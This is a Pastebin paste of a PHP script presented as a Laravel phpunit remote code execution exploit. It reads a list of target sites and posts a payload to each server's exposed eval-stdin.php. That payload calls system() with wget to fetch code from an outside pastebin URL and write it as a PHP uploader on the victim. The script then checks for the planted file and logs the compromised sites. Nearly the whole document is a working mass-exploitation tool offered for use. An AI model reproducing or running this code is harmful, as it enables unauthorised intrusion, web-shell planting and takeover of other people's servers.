ustadcage_48

Laravel framework phpunit RCE

Jun 18th, 2019
2,741
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. // coded by UstadCage_48
  3. // PHPlaravel RCE
  4. // Bacot sia mah ah
  5.  
  6. error_reporting(0);
  7. echo "  ─────────────────────────
  8.  ╔╗─╔═╗─╔╦╗╔═╗─╔═╦═╗╔═╗╔╗─
  9.  ║╚╗║╬╚╗║╔╝║╬╚╗╚╗║╔╝║╩╣║╚╗
  10.  ╚═╝╚══╝╚╝─╚══╝─╚═╝─╚═╝╚═╝\n\n";
  11. $site = $argv[1];
  12. $by = '♥ LusianaQ<?php system("wget https://pastebin.com/raw/vKfyPDA3 -O eval-tad.php"); ?>';
  13. $byy = fopen('tad.txt', 'w');
  14. fwrite($byy,$by);
  15. fclose($byy);
  16. $up = '@tad.txt';
  17. $path = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php";
  18. function sv($site,$ext){
  19. $fp = fopen("$ext.txt", 'a');
  20. fwrite($fp, "$site\n");
  21. fclose($fp);
  22. }
  23. $kuning = "\033[93m";
  24. $ungu = "\033[95m";
  25. $biru = "\033[94m";
  26. $merah = "\033[91m";
  27. $hijau = "\033[92m";
  28. $lusi = explode("\n",file_get_contents($site));
  29.    foreach($lusi as $url){
  30.       echo "$ungu [$] $kuning $url\n";
  31.     $jj = shell_exec("curl -sk -d ''".$up."'' ".$url.$path."");
  32.     if(preg_match('/LusianaQ/',$jj)){
  33.         echo "$ungu [$] $hijau Exploit Succesfuly...\n";
  34.         echo "$ungu [$] $kuning Checking Uploader...\n";
  35. $parse = parse_url($url.$path);
  36. $pattern = '~\w+\.php~';
  37. $parse = preg_replace($pattern, '', $parse);
  38. $site = $parse['scheme'].'://'.$parse['host'].$parse['path'];
  39.         if(preg_match('/USTADCAGE_48/',file_get_contents($site."tad.php"))){
  40.             echo "$ungu [$] $hijau Uploader Successfuly Created ! \n\n";
  41.             sv($site."tad.php","xhell");
  42.         } else {
  43.             echo "$ungu [$] $merah Uploader Failed Created \n\n";
  44.         }
  45.     } else {
  46.         echo "$ungu [$] $merah Exploit Failed !! \n\n";
  47.     }
  48. }
RAW Paste Data